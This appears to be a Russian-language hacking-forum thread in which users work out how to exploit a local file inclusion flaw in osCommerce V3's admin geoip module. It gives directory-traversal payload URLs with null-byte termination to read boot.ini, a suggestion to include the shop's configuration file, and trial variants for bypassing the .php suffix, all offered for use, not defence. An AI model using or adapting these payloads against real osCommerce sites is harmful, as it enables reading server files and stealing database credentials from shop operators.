OSCommerce V3 LFI

Discussion in 'Уязвимости' started by Pirotexnik, 10 Jun 2012.

  1. Pirotexnik

    Pirotexnik Banned

    Joined:
    13 Oct 2010
    Messages:
    365
    Likes Received:
    68
    Reputations:
    38
    Нашел LFI, но незнаю как реализовать...

    http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../../../../../../../../../../../../boot.ini%00

    Все бы хорошо, но помимо include() эта переменная используется еще где-то:
    Code:
    Fatal error: Call to a member function loadIniFile() on a non-object in C:\web\htdocs\oscommerce\admin\includes\applications\modules_geoip\pages\edit.php on line 18
    Code:
    18: $osC_Language->loadIniFile('modules/geoip/' . $_GET['module'] . '.php');
    Помогите
     
    #1 Pirotexnik, 10 Jun 2012
    Last edited: 10 Jun 2012
  2. pharm_all

    pharm_all Member

    Joined:
    10 Sep 2009
    Messages:
    115
    Likes Received:
    7
    Reputations:
    0


    http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../../../../../../../../C:/web/htdocs/oscommerce/includes/conf не помню название конфига.php%00



    Проинклудь конфиг, поиграйся.
     
  3. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204
    Pirotexnik
    Шляпу экстрасенса, увы, потерял, поэтому требую код ф-ции loadIniFile =\
    И строку с инклюдом данной переменной тоже неплохо бы увидеть.

    pharm_all
    Что-что, простите? Каким образом он проинклюдит (и как это поможет!?) если у него не работает инклюд?
     
    #3 Tigger, 15 Jun 2012
    Last edited: 15 Jun 2012
  4. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204
    [​IMG]

    Что я делаю не так?

    Посмотрел кодес. Интересно, причем тут это вообще? Инклюд идет в первой строчке скрипта. Причем тут вообще то, что вызывается далее?
     
    #4 Tigger, 15 Jun 2012
    Last edited: 15 Jun 2012
  5. Pirotexnik

    Pirotexnik Banned

    Joined:
    13 Oct 2010
    Messages:
    365
    Likes Received:
    68
    Reputations:
    38
    Да, затупил я...

    Теперь вопрос по поводу .php

    http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../lfi - GOOD

    http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../lfi.php%00 - BAD

    http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../lfi.gif%00 - BAD
    ./[4096] - тоже не спасли. Это у меня на локалхосте косяк?)
    Как быть?
     
  6. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,037
    Likes Received:
    531
    Reputations:
    935
    потому что скорее всего не правильно юзаешь аналог нульбайту
     
    _________________________
  7. Pirotexnik

    Pirotexnik Banned

    Joined:
    13 Oct 2010
    Messages:
    365
    Likes Received:
    68
    Reputations:
    38
    А как тгда правильно? О_о
     
Loading...